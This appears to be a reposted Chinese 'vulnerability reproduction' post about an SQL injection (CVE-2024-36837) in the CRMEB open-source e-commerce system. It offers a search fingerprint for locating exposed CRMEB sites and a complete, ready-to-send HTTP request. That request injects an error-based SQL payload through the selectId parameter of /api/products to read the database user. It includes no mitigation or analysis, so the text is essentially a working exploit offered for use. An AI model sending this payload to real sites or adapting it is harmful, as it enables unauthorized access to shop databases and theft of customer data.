0x02
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
查询当前用户
原文始发于微信公众号(冷漠安全):「漏洞复现」CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论